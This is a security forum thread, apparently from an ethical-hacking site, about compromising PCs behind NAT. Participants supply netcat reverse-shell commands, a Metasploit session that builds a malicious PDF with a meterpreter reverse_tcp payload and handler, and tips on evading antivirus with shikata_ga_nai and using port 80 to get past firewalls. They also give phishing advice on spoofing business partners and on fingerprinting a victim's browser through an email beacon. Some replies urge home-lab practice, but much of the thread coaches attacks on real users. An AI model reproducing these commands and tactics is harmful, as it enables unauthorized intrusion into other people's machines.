How to penetrate a PC through NAT?

    • #4963
      rebrov
      Participant

      Suppose I have 4 PCs in my network and of course I am using the NAT protocol to translate all 4 of my addresses to 1 public IP.

      Well, the question is: is there any chance to penetrate my network through NAT?

      And how to do it?

    • #31329
      kriscamaro68
      Participant

      @rebrov wrote:

      Suppose I have 4 PCs in my network and of course I am using the NAT protocol to translate all 4 of my addresses to 1 public IP.

      Well, the question is: is there any chance to penetrate my network through NAT?

      And how to do it?

      I would think it would be possible through a social engineering attack of sorts, by sending the user an e-mail which they click on that installs some sort of software, or maybe has a link to a site that infects the computer. Other than that I wouldn’t know, because I am still too new at this stuff. Maybe someone else could shed some more light on it.

    • #31330
      n1p
      Participant

      Yes, you may need to initiate a connection from the internal network/PCs. However, NAT routers may also have running services that can be exploited (remote administration/FTP). They may also forward ports to services on the client PC that may be exploited.

    • #31331
      j0rDy
      Participant

      Attacks through a NAT are always done through a reverse connection, because you cannot connect directly to the machine in the network, like n1p said. If there are ports forwarded, the attacker can connect to them directly…

    • #31332
      caissyd
      Participant

      To add to what j0rDy mentioned, your system could also get compromised by surfing to malicious web sites (cross-site scripting).

    • #31333
      unsupported
      Participant

      For your scenario, you can shovel a shell/reverse shell using NetCat.  How do you get NetCat on the machine from the outside?  It is so small it can fit inside a buffer overflow or you can combine it with another executable which is run on the inside.

    • #31334
      rebrov
      Participant

      Yes, that’s right, the only way is to use reverse telnet or a reverse trojan... a connect-back trojan, is that right?

      But how do I use a reverse telnet connection to the target, in case I can deliver netcat to the target?

    • #31335
      Xen
      Participant

      After you install netcat on the target machine you can create a reverse shell on the target machine that will connect to you.
      Firstly, you must have a netcat listener running on your machine.

      Command:
      nc -l -p <port>

      Then you make a reverse shell from the target machine connect to you.

      For a Windows target:
      nc <your_ip> <port> -e cmd.exe
      For a Linux target:
      nc <your_ip> <port> -e /bin/bash

    • #31336
      rebrov
      Participant

      @Equix3n- wrote:

      After you install netcat on the target machine you can create a reverse shell on the target machine that will connect to you.
      Firstly, you must have a netcat listener running on your machine.

      Command:
      nc -l -p <port>

      Then you make a reverse shell from the target machine connect to you.

      For a Windows target:
      nc <your_ip> <port> -e cmd.exe
      For a Linux target:
      nc <your_ip> <port> -e /bin/bash

      That’s working only when you have physical access to the 2 machines, right?

      And also I think you have to use a kind of no-ip service if the 2 machines are behind NAT, right?

      But what if you don’t have physical access to the machine? It’s penetrating, not negotiating with 2 machines you own, you get what I mean?

    • #31337
      Xen
      Participant

      You don’t have to have physical access to these machine to launch a reverse shell. You can try for client side exploits and get the shell. It’s all done remotely.

    • #31338
      rebrov
      Participant

      @Equix3n- wrote:

      You don’t have to have physical access to these machine to launch a reverse shell. You can try for client side exploits and get the shell. It’s all done remotely.

      Exploits? What do you mean? I can’t exploit it yet because it’s NATted!

      How can I exploit it if it’s NATted in the first place?

    • #31339
      hayabusa
      Participant

      @rebrov

      To exploit a machine behind NAT, you will have to get the remote user to access a malicious webpage, send an email that deceives them into opening a malicious attachment, or otherwise find a way to manipulate the remote user into executing code to create your reverse shell or otherwise give you access.  That’s why they said “You can try for client side exploits…”  You need to find some vulnerability on the client machine that either auto-executes malicious code, or tricks the user into running it, so you can gain access.  Aside from those, unless you gain physical access to a machine behind the NAT, and run code yourself, there won’t be a way to exploit the clients behind NAT, as you cannot directly connect to them from outside, without a reverse shell.

    • #31340
      Xen
      Participant

      The goal of client-side exploits is to make the victim initiate an outbound connection to you. Here we try to exploit the applications installed on the victim’s computer. The only drawback of this method is that you’ve to rely on the victim to access your machines or run your code. Furthermore you’ve to guess what software the victim might be running.
      You’ve a server that serves exploits to the client machines connecting to it. You send a script/URL to the victim which makes the appropriate client machine connect to the attacker’s server. The server then exploits the client connecting to it.
      For e.g. suppose you know that a user is not very security conscious. He rarely updates his system and is probably still using IE6. You send him a fake email which contains a link/script to your server that serves an appropriate IE6 exploit. When the user clicks on your URL and visits your server his browser is exploited to spawn a reverse shell to you.

      As a side note, it will be good for you if you try to learn some things by yourself too. I had already told you that client-side exploits are the way to go here. You could have googled for client-side exploits which would’ve given you more detailed articles. Learning from a forum is only beneficial if you make some effort from your side too. No one will spoon-feed you, you can only be given pointers. I do not mean to discourage you from asking questions, you’ll be helped in the future also, but want you to learn some things yourself too.

      Edit: I didn’t mean to be rude. It’s just that English isn’t my primary language, so I may not have expressed my emotions clearly.

    • #31341
      rebrov
      Participant

      @Equix3n- wrote:

      The goal of client-side exploits is to make the victim initiate an outbound connection to you. Here we try to exploit the applications installed on the victim’s computer. The only drawback of this method is that you’ve to rely on the victim to access your machines or run your code. Furthermore you’ve to guess what software the victim might be running.
      You’ve a server that serves exploits to the client machines connecting to it. You send a script/URL to the victim which makes the appropriate client machine connect to the attacker’s server. The server then exploits the client connecting to it.
      For e.g. suppose you know that a user is not very security conscious. He rarely updates his system and is probably still using IE6. You send him a fake email which contains a link/script to your server that serves an appropriate IE6 exploit. When the user clicks on your URL and visits your server his browser is exploited to spawn a reverse shell to you.

      As a side note, it will be good for you if you try to learn some things by yourself too. I had already told you that client-side exploits are the way to go here. You could have googled for client-side exploits which would’ve given you more detailed articles. Learning from a forum is only beneficial if you make some effort from your side too. No one will spoon-feed you, you can only be given pointers. I do not mean to discourage you from asking questions, you’ll be helped in the future also, but want you to learn some things yourself too.

      No no, you were very gentle and helpful, guys. From my side I will try to search more and learn more about client-side; I’ll tell you what I get later. Thanks guys for the information 🙂

    • #31342
      sil
      Participant

      @rebrov wrote:

      No no, you were very gentle and helpful, guys. From my side I will try to search more and learn more about client-side; I’ll tell you what I get later. Thanks guys for the information 🙂

      Take a different approach here in understanding this from a non-technological perspective. This allows you to understand the concept more…

      Technological approach
      Client
      Server

      Non-tech approach
      Client – someone paying you for something
      Vendor (server) – someone offering a service

      On the non-tech side, you as a vendor are providing say water. You’d like your client to buy (run software) water (exploit). How would you get the client to try your tasty water. Offer it to them for free. People like free.

      Tech approach
      Enumerate – either technically or socially – any potential services you think your client is running. Familiarize yourself somehow with his internals. Send them an email with an embedded picture:

      What does this do for you? If you’re running your own webserver, you could check your logs to see the useragent on his browser. Say you see the following:

      "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

      You now know whoever opened that email is using IE 6.0 to surf the Internet. How do you cause your client (that machine) to open something innocuous and run code? Search for something that could potentially affect his browser. The client would run code and open a shell to you given the right parameters.

      Client side: What could that person be running inside their network? If I send them a loaded PDF, would I get a shell? If I sent them a heap-spraying IE exploit targeted at IE 6.0, would I be able to come OUT from them TO wherever I need them to connect to?

      Can I social engineer them to open a loaded file for me? Enumerate THEIR clients and business partners. Send them a loaded PDF spoofing one of their clients, business partners, co-workers. Get them to open up something you’ve created to exploit the client side. The key is to get them to run something. Could be a variety of things, use your imagination. What would get YOU TO OPEN a file or check a website?
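
sil's suggestion to read the User-Agent out of your own web server logs after the target loads an embedded image, as an added example that is not part of the original post: a Python parser for the Apache/nginx "combined" log format that keeps only the requests for the beacon image and reduces each User-Agent to browser, version and Windows release. The log lines, the client IP addresses and the beacon path /img/logo.gif are constructed for this example; the "MSIE 6.0; Windows NT 5.0" string is the one sil quotes.

```python
import re
from collections import defaultdict

# Constructed "combined" access-log sample (Apache/nginx default format); not real traffic.
SAMPLE_LOG = """\
203.0.113.45 - - [10/Mar/2010:14:02:11 +0000] "GET /img/logo.gif HTTP/1.1" 200 1234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
203.0.113.45 - - [10/Mar/2010:14:02:12 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
198.51.100.7 - - [10/Mar/2010:14:05:40 +0000] "GET /img/logo.gif HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
192.0.2.10 - - [10/Mar/2010:14:06:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "curl/7.19.7"
this line is not a valid log entry
"""

# One regex for the combined format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Windows NT kernel versions as reported in UA strings -> product names
NT_NAMES = {"5.0": "Windows 2000", "5.1": "Windows XP", "6.0": "Windows Vista", "6.1": "Windows 7"}


def parse_combined_log(text):
    """Yield one dict per well-formed line; anything the regex rejects is skipped."""
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            yield m.groupdict()


def fingerprint(ua):
    """Reduce a User-Agent string to (browser, version, os). Unknown agents come
    back as ("unknown", "", ua) so the caller still sees the raw string."""
    m = re.search(r"MSIE (\d+\.\d+);.*Windows NT (\d+\.\d+)", ua)
    if m:
        return ("Internet Explorer", m.group(1), NT_NAMES.get(m.group(2), "Windows NT " + m.group(2)))
    m = re.search(r"Windows NT (\d+\.\d+).*Firefox/(\d+\.\d+)", ua)
    if m:
        return ("Firefox", m.group(2), NT_NAMES.get(m.group(1), "Windows NT " + m.group(1)))
    return ("unknown", "", ua)


def beacon_report(text, beacon_path):
    """For every client that fetched beacon_path (the image embedded in the e-mail),
    return the sorted list of distinct fingerprints seen, keyed by source IP."""
    hits = defaultdict(set)
    for rec in parse_combined_log(text):
        if rec["path"] == beacon_path:
            hits[rec["ip"]].add(fingerprint(rec["ua"]))
    return {ip: sorted(fps) for ip, fps in hits.items()}


if __name__ == "__main__":
    for ip, fps in beacon_report(SAMPLE_LOG, "/img/logo.gif").items():
        print(ip, fps)
```

Filtering on the beacon path matters: the favicon and index requests in the sample come from the same or other clients but tell you nothing about who opened the e-mail, and a mail client that does not render remote images will simply never appear in the report.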

    • #31343
      hayabusa
      Participant

      @sil – you worded that extremely well for rebrov!

      Sometimes, you just need to think outside of the box, rebrov.  There have been many times I wish I could just hammer, directly, on a target machine, and exploit it, during pentests.  But you have to realize that there will be MANY times when there just aren’t any open services / targets to hit, in a direct manner.  So you need to think outside the box, and find a way to let THEM come to YOU.

      Be patient, and spend a good amount of time learning about the client-side (btw, often times, it’s MUCH easier to access a target by means of client-side / social exploitation, than it ever would be to try to directly attack.)  Very often, the end user is the weakest link in network security, as, without good, formal training included in a company’s security posture and plans, the end user is generally VERY easily manipulated.

    • #31344
      rebrov
      Participant

      Wow, I already know now how to do a client-side attack with Metasploit.

      I read it on the Offensive Security website, it’s wonderful.

      The question now is:

      While creating a malicious PDF file to send out to the victim for a reverse connection, check out these commands in Metasploit:

      msf > use exploit/windows/fileformat/adobe_utilprintf
      msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
      FILENAME => BestComputers-UpgradeInstructions.pdf
      msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(adobe_utilprintf) > set LPORT 4455
      LPORT => 4455
      msf exploit(adobe_utilprintf) > show options

      At the LPORT part, I think I should open this port at the router to pass the reverse traffic from the victim to me, right? For the reverse connection, after the victim executes the file.

      So the question is: should I also open this port at the router and define my local IP on this port to pass the traffic, to get a successful reverse connection?

    • #31345
      sil
      Participant

      @rebrov wrote:

      msf > use exploit/windows/fileformat/adobe_utilprintf
      msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
      FILENAME => BestComputers-UpgradeInstructions.pdf
      msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(adobe_utilprintf) > set LPORT 4455
      LPORT => 4455
      msf exploit(adobe_utilprintf) > show options

      At the LPORT part, I think I should open this port at the router to pass the reverse traffic from the victim to me, right? For the reverse connection, after the victim executes the file.

      So the question is: should I also open this port at the router and define my local IP on this port to pass the traffic, to get a successful reverse connection?

      Just so you know, most antivirus software will detect most metasploit client side exploits. At least Kaspersky, Symantec, Trend Micro, Avast and a few others. Again, go back to the client/server analogy and think about this for a moment.

      In a controlled environment, say an enterprise, you’re almost likely to have filtering on a firewall, IPS, IDS side which WON’T allow internal machines to connect to too many EXTERNAL ports. Meaning, why would you allow one of your users (if you’re the admin) to connect to say a non business associated port. Typically 80, 21, 3128, 8080, 110, etc. The likelihood of the exploit working even IF you got through antivirus is slim.

      msfencode -e x86/shikata_ga_nai is your friend. LPORT I typically configure for port 80 when I use metasploit since it’s a webserver and usually allowed as a firewall, IPS, IDS rule to connect TO (server) the world FROM (client) the enterprise.

      Familiarize yourself with the following chart:

      http://cwe.mitre.org/documents/sources/WASCThreatClassificationTaxonomyGraphic.pdf

      Watch the following video:
      http://pentest.cryptocity.net/client-sides/

      Also worth reading:
      http://www.offensive-security.com/metasploit-unleashed/Antivirus-Bypass
      http://seclists.org/metasploit/2010/q2/22

      You seem to want “right now!” and it involves a lot more than simply wondering which port to pick which application to run. It involves a lot of understanding on the processes involved in interconnection and how systems operate. “What would the system do… How does it do it? What would happen if I…?” These are questions you should ask and be able to answer to make things easier as time progresses. Make yourself a quick checklist slash to do list and follow a procedure. Find your errors and try to minimize those. After a while it becomes easier.

      E.g.:

      Goal exploit the client side
      Step 1) Determine an attack vector
      Step 2) Determine how that attack vector plays out
      Step 3) Document how it would work for you
      Step 4) Try it on yourself
      Step 5) Did it work, jot down why it did or didn’t
      Step 6) Attempt to exploit
      Step 7) Record and analyze results

      Explained…
      Step 1) Determine how you propose to get in. So you chose to send them a loaded PDF

      Step 2) How do you envision delivering and getting them to open up the PDF

      Step 3) Jot down EXACTLY what you perceive happening

      Step 4) Send yourself the exploit in a controlled environment

      Step 5) What happened when you tried to exploit yourself. Did your antivirus cry foul. Was the connection successful. Did it allow you to connect BACK to the port you specified. Why or why not?

      Step 6) All worked for you… Send out the exploit

      Step 7) Did it work. If it did, you now have a repeatable procedure you can follow on other pentesting adventures. If not, rinse and repeat.

    • #31346
      rebrov
      Participant

      @sil wrote:

      @rebrov wrote:

      msf > use exploit/windows/fileformat/adobe_utilprintf
      msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
      FILENAME => BestComputers-UpgradeInstructions.pdf
      msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(adobe_utilprintf) > set LPORT 4455
      LPORT => 4455
      msf exploit(adobe_utilprintf) > show options

      At the LPORT part, I think I should open this port at the router to pass the reverse traffic from the victim to me, right? For the reverse connection, after the victim executes the file.

      So the question is: should I also open this port at the router and define my local IP on this port to pass the traffic, to get a successful reverse connection?

      Just so you know, most antivirus software will detect most metasploit client side exploits. At least Kaspersky, Symantec, Trend Micro, Avast and a few others. Again, go back to the client/server analogy and think about this for a moment.

      In a controlled environment, say an enterprise, you’re almost likely to have filtering on a firewall, IPS, IDS side which WON’T allow internal machines to connect to too many EXTERNAL ports. Meaning, why would you allow one of your users (if you’re the admin) to connect to say a non business associated port. Typically 80, 21, 3128, 8080, 110, etc. The likelihood of the exploit working even IF you got through antivirus is slim.

      msfencode -e x86/shikata_ga_nai is your friend. LPORT I typically configure for port 80 when I use metasploit since it’s a webserver and usually allowed as a firewall, IPS, IDS rule to connect TO (server) the world FROM (client) the enterprise.

      Familiarize yourself with the following chart:

      http://cwe.mitre.org/documents/sources/WASCThreatClassificationTaxonomyGraphic.pdf

      Watch the following video:
      http://pentest.cryptocity.net/client-sides/

      Also worth reading:
      http://www.offensive-security.com/metasploit-unleashed/Antivirus-Bypass
      http://seclists.org/metasploit/2010/q2/22

      You seem to want “right now!” and it involves a lot more than simply wondering which port to pick which application to run. It involves a lot of understanding on the processes involved in interconnection and how systems operate. “What would the system do… How does it do it? What would happen if I…?” These are questions you should ask and be able to answer to make things easier as time progresses. Make yourself a quick checklist slash to do list and follow a procedure. Find your errors and try to minimize those. After a while it becomes easier.

      E.g.:

      Goal exploit the client side
      Step 1) Determine an attack vector
      Step 2) Determine how that attack vector plays out
      Step 3) Document how it would work for you
      Step 4) Try it on yourself
      Step 5) Did it work, jot down why it did or didn’t
      Step 6) Attempt to exploit
      Step 7) Record and analyze results

      Explained…
      Step 1) Determine how you propose to get in. So you chose to send them a loaded PDF

      Step 2) How do you envision delivering and getting them to open up the PDF

      Step 3) Jot down EXACTLY what you perceive happening

      Step 4) Send yourself the exploit in a controlled environment

      Step 5) What happened when you tried to exploit yourself. Did your antivirus cry foul. Was the connection successful. Did it allow you to connect BACK to the port you specified. Why or why not?

      Step 6) All worked for you… Send out the exploit

      Step 7) Did it work. If it did, you now have a repeatable procedure you can follow on other pentesting adventures. If not, rinse and repeat.

      Thanks for the information. What I figured out when I tried netcat with my friend, with the following commands:

      nc -lvp 80 (at my PC)

      and:

      nc "no-ipdns.biz" 80 -e cmd.exe (at my friend’s PC)

      After I executed the command there, nothing happened at my PC; I didn’t get the cmd reverse shell, dunno.

      The question here: I tried this with no-ip because I’m already NATted too, me and him, so should I do this by opening a port in the router?

      Because he is NATted and I’m NATted, how do I do this?

    • #31347
      What90
      Participant

      You’ll need to work out on your router how to do port forwarding for inbound tcp 80 to your computer with netcat on it.

      This does place a certain risk by opening up port 80 to your machine, so make sure your machine is fully patched before trying this.

      I think you may want to go with sil’s advice and set this up at home first and practice it on your local network.

    • #31348
      rebrov
      Participant

      @What90 wrote:

      You’ll need to work out on your router how to do port forwarding for inbound tcp 80 to your computer with netcat on it.

      This does place a certain risk by opening up port 80 to your machine, so make sure your machine is fully patched before trying this.

      I think you may want to go with sil’s advice and set this up at home first and practice it on your local network.

      That’s what I meant, so my question is:

      Is there any way to make a reverse connection to a NATted PC like mine without port forwarding? Because I know that traffic coming from the reverse connection should be passed by the router to my PC! But I’m wondering, is there any way to do the same process without opening a port in my router for incoming traffic?

    • #31349
      Xen
      Participant

      @rebrov wrote:

      That’s what I meant, so my question is:

      Is there any way to make a reverse connection to a NATted PC like mine without port forwarding? Because I know that traffic coming from the reverse connection should be passed by the router to my PC! But I’m wondering, is there any way to do the same process without opening a port in my router for incoming traffic?

      You’ll have to forward a port from your router to PC otherwise you’re just making the reverse shell connect to your router and not your PC. The connection stops at your router. This is what happens when you try to scan through a NAT. Since ports aren’t forwarded you end up scanning the router. If there had been a workaround then you wouldn’t have needed client-side exploits for NAT configurations.
      Forwarding the port shouldn’t be a problem for you as long as your system is completely patched and you do it for a short duration only. So once you get a reverse shell from your friend’s computer you can close the port again. After this the ideal approach should be to practice this stuff in your home lab. You can practice in a controlled manner and without the probability of you being compromised. You can add various scenarios, firewalls and routers to your test lab. There’s a lot of free stuff available like vyatta routers that’ll help you completely replicate a physical environment. And it’s all very cheap too 😀
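
Xen's point that the reverse connection stops at the attacker's router unless a port is forwarded, and that scanning a NATted host only ever reaches the router, as an added example that is not part of the original thread: a small Python model of two masquerading routers using the addresses from the msf transcript above (LHOST 192.168.8.128, LPORT 4455). The two public addresses, the victim's inside address and the router behaviour (a dynamic translation table plus static port-forward rules, nothing else) are constructed assumptions of the model, not a description of any particular router.

```python
class NatRouter:
    """Toy model of a masquerading home router: one public IP, many inside hosts.
    Only the translation table and port-forward rules are modelled (no timeouts,
    no ICMP, no ALGs)."""

    def __init__(self, public_ip, port_forwards=None):
        self.public_ip = public_ip
        # static rules: public port -> (inside_ip, inside_port), i.e. "port forwarding"
        self.port_forwards = dict(port_forwards or {})
        # dynamic entries created by outbound traffic: public port -> flow 4-tuple
        self.table = {}
        self.next_public_port = 40000

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """An inside host sends a packet out. The router rewrites the source to
        (public_ip, fresh port), remembers the mapping, and returns the packet
        as the Internet sees it."""
        pub_port = self.next_public_port
        self.next_public_port += 1
        self.table[pub_port] = (src_ip, src_port, dst_ip, dst_port)
        return (self.public_ip, pub_port, dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_port):
        """A packet from the Internet arrives at public_ip:dst_port. Returns the
        (inside_ip, inside_port) it is delivered to, or None if the router drops it."""
        flow = self.table.get(dst_port)
        if flow is not None and flow[2:] == (src_ip, src_port):
            return flow[0], flow[1]              # reply to an existing outbound flow
        if dst_port in self.port_forwards:
            return self.port_forwards[dst_port]  # explicitly forwarded service
        return None                              # unsolicited: nobody inside is reachable


# Constructed addresses for the two sides of the thread's scenario (not real hosts).
ATTACKER_PUBLIC = "198.51.100.20"
ATTACKER_LHOST = "192.168.8.128"   # attacker's LAN address, as in the msf transcript
VICTIM_PUBLIC = "203.0.113.9"
VICTIM_INSIDE = "10.0.0.5"


def direct_attack(victim_router, target_port):
    """Attacker sends a SYN straight at the victim's public IP (what a port scan does).
    With no forward rule the packet never gets past the router."""
    return victim_router.inbound(ATTACKER_PUBLIC, 33333, target_port)


def reverse_connection(attacker_router, lport):
    """The victim's payload connects back to ATTACKER_PUBLIC:lport. The victim's
    router needs no configuration at all; whether the SYN reaches the attacker's
    PC depends entirely on the attacker's router. Returns (delivered_to, replies_ok)."""
    victim_router = NatRouter(VICTIM_PUBLIC)
    pub_ip, pub_port, dst_ip, dst_port = victim_router.outbound(
        VICTIM_INSIDE, 51000, ATTACKER_PUBLIC, lport)
    delivered_to = attacker_router.inbound(pub_ip, pub_port, dst_port)
    # the victim's router passes the handler's replies because it created the flow itself
    replies_ok = (delivered_to is not None and
                  victim_router.inbound(dst_ip, dst_port, pub_port) == (VICTIM_INSIDE, 51000))
    return delivered_to, replies_ok


def run_scenarios(lport=4455):
    no_forward = NatRouter(ATTACKER_PUBLIC)
    with_forward = NatRouter(ATTACKER_PUBLIC, {lport: (ATTACKER_LHOST, lport)})
    return {
        "scan_victim_445": direct_attack(NatRouter(VICTIM_PUBLIC), 445),
        "reverse_no_forward": reverse_connection(no_forward, lport),
        "reverse_with_forward": reverse_connection(with_forward, lport),
    }


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name}: {result}")
```

The three results line up with the thread: the scan lands on the victim's router and is dropped, the connect-back without a forward rule also dies at the attacker's router, and only with `4455 -> 192.168.8.128:4455` configured does the session reach the host running the handler, after which both routers pass the traffic in both directions.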

    • #31350
      rebrov
      Participant

      @Equix3n- wrote:

      @rebrov wrote:

      That’s what I meant, so my question is:

      Is there any way to make a reverse connection to a NATted PC like mine without port forwarding? Because I know that traffic coming from the reverse connection should be passed by the router to my PC! But I’m wondering, is there any way to do the same process without opening a port in my router for incoming traffic?

      You’ll have to forward a port from your router to PC otherwise you’re just making the reverse shell connect to your router and not your PC. The connection stops at your router. This is what happens when you try to scan through a NAT. Since ports aren’t forwarded you end up scanning the router. If there had been a workaround then you wouldn’t have needed client-side exploits for NAT configurations.
      Forwarding the port shouldn’t be a problem for you as long as your system is completely patched and you do it for a short duration only. So once you get a reverse shell from your friend’s computer you can close the port again. After this the ideal approach should be to practice this stuff in your home lab. You can practice in a controlled manner and without the probability of you being compromised. You can add various scenarios, firewalls and routers to your test lab. There’s a lot of free stuff available like vyatta routers that’ll help you completely replicate a physical environment. And it’s all very cheap too 😀

      Well, money is an issue for me :S lol

      But I wonder then how TeamViewer and other software like it work without port forwarding 🙂 How does it work?

      And thanks for the information, I already understand how the client-side attack works 🙂

    • #31351
      Xen
      Participant

      You do not need any expensive stuff to build your ‘virtual’ test lab. In fact most of the stuff in my lab is absolutely free. You can find various open source counterparts of commercial tools.
      There are various ‘free’ virtualization products available like virtualbox, vmware player and vmware server. I’m a big fan of vmware products. Personally, I believe that vmware server will be enough for what you want to do. Vmware server is a stripped down version of the excellent commercial vmware workstation but contains almost all the basic features you’ll require. You can download pre-built linux virtual machines from the vmware website http://www.vmware.com/appliances/directory/
      There’s also a free route to get a Windows OS. Either you can download the OS from Microsoft’s website, which comes with around a 3-month trial period. Furthermore, you can also download a Windows XP SP2 virtual machine from NIST’s website http://www.offensive-security.com/metasploit-unleashed/windows-xp-machine-setup
      As for software like ftp, telnet daemons and webservers etc…well most of them are free anyway  😀

      Jhaddix and Laz3r have posted wonderful tutorials to build a virtual test lab. You can get them here:-
      Network pentest lab setup
      Pentest Lab: Web Application Edition

      Additionally, you can practice on ready made targets like De-ICE live disks, hackerdemia and pWnOS all of which are available here http://forums.heorot.net/  You also have LAMP security disks http://sourceforge.net/projects/lampsecurity/  Also try your hands at the ‘Skillz’ section of this forum http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/board,12.0/ They will test your limits.
      There’s also a topic here at EHNet which will direct you to more stuff for practicing http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5043.0/

      As for the other part of your question.
      TeamViewer does not make you connect to the remote computer directly (unless you are both on the same network). When you initiate a connection to a remote computer, you and the remote computer are in fact connected to the TeamViewer server. So all the data flows through the server and you don’t have to forward any ports or worry about the firewall rules  ::)

      I hope that solved some of your problems 🙂

    • #31352
      rebrov
      Participant

      @Equix3n- wrote:

      You do not need any expensive stuff to build your ‘virtual’ test lab. In fact most of the stuff in my lab is absolutely free. You can find various open source counterparts of commercial tools.
      There are various ‘free’ virtualization products available like virtualbox, vmware player and vmware server. I’m a big fan of vmware products. Personally, I believe that vmware server will be enough for what you want to do. Vmware server is a stripped down version of the excellent commercial vmware workstation but contains almost all the basic features you’ll require. You can download pre-built linux virtual machines from the vmware website http://www.vmware.com/appliances/directory/
      There’s also a free route to get a Windows OS. Either you can download the OS from Microsoft’s website, which comes with around a 3-month trial period. Furthermore, you can also download a Windows XP SP2 virtual machine from NIST’s website http://www.offensive-security.com/metasploit-unleashed/windows-xp-machine-setup
      As for software like ftp, telnet daemons and webservers etc…well most of them are free anyway  😀

      Jhaddix and Laz3r have posted wonderful tutorials to build a virtual test lab. You can get them here:-
      Network pentest lab setup
      Pentest Lab: Web Application Edition

      Additionally, you can practice on ready made targets like De-ICE live disks, hackerdemia and pWnOS all of which are available here http://forums.heorot.net/  You also have LAMP security disks http://sourceforge.net/projects/lampsecurity/  Also try your hands at the ‘Skillz’ section of this forum http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/board,12.0/ They will test your limits.
      There’s also a topic here at EHNet which will direct you to more stuff for practicing http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5043.0/

      As for the other part of your question.
      TeamViewer does not make you connect to the remote computer directly (unless you are both on the same network). When you initiate a connection to a remote computer, you and the remote computer are in fact connected to the TeamViewer server. So all the data flows through the server and you don’t have to forward any ports or worry about the firewall rules  ::)

      I hope that solved some of your problems 🙂

      Thanks a lot for this information, it helped a lot. I will check out the pentest lab to build my own one 🙂 and try to practice more and more 🙂 Thanks buddy.

    • #31353
      rebrov
      Participant

      Well... I have an issue.

      I tried this client-side attack with Metasploit 3.3.3.

      And when I’m creating the malicious PDF file the window disappears... why?

      While at the Offensive Security site it was:

      msf > use exploit/windows/fileformat/adobe_utilprintf
      msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
      FILENAME => BestComputers-UpgradeInstructions.pdf
      msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(adobe_utilprintf) > set LPORT 4455
      LPORT => 4455

      msf exploit(adobe_utilprintf) > exploit

      [*] Handler binding to LHOST 0.0.0.0
      [*] Started reverse handler
      [*] Creating ‘BestComputers-UpgradeInstructions.pdf’ file…
      [*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf
      [*] Exploit completed, but no session was created.
      msf exploit(adobe_utilprintf) >

      why does mine disappear ,, i can’t even read the loading commands in msf cuz it’s running very fast and then closes

      anyway when i opened the msf directory and looked at the .pdf file i found it is about 7 kb in size

      my question is : at the part–> set LHOST 192.168.8.128

      i put my local LAN ip or my public NATTED ip ?????

      1st time i put my local lan ip its 10.0.0.167

      then i started the multi handler to make msf listen for the reverse connection from the remote target

      msf > use exploit/multi/handler
      msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(handler) > set LPORT 4455
      LPORT => 4455
      msf exploit(handler) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(handler) > exploit

      [*] Handler binding to LHOST 0.0.0.0
      [*] Started reverse handler
      [*] Starting the payload handler.

      then i delivered it to the remote target with no response ,,,

      tip : i changed the LPORT to 80 in both steps cuz i think the router should pass the traffic to me because it’s port 80 and is never closed, right ??

      what might be the problem ??

    • #31354
      sil
      Participant

      @rebrov wrote:

      LHOST => 192.168.8.128

      my question is : at the part–> set LHOST 192.168.8.128

      i put my local LAN ip or my public NATTED ip ?????

      what might be the problem ??

      Constructive criticism time…

      You need to learn the differences between routable IPs and RFC 1918 addresses. (http://www.faqs.org/rfcs/rfc1918.html) RFC 1918 addresses would never be routable across the Internet. So while you placed the L(istening)HOST address, you made it into a Local Address on the 192.168.8.x network. So unless both you and that victim were on the same network, it would never work. I suggest understanding the differences in addressing before even going further. Networking is a fundamental MUST UNDERSTAND if you’re going to get involved with pentesting. I rank it as the TOP priority.

      I suggest learning TCP/IP and routing so here is the freebie for the week: Juniper’s Fast Track training program. It’s free and informative for anyone seeking to understand networking. You don’t need to necessarily want to aim for JNCIA certification but watching the content and reading the content will help you in the long run.

      https://learningportal.juniper.net/juniper/user_fasttrack_home.aspx

    • #31355
      rebrov
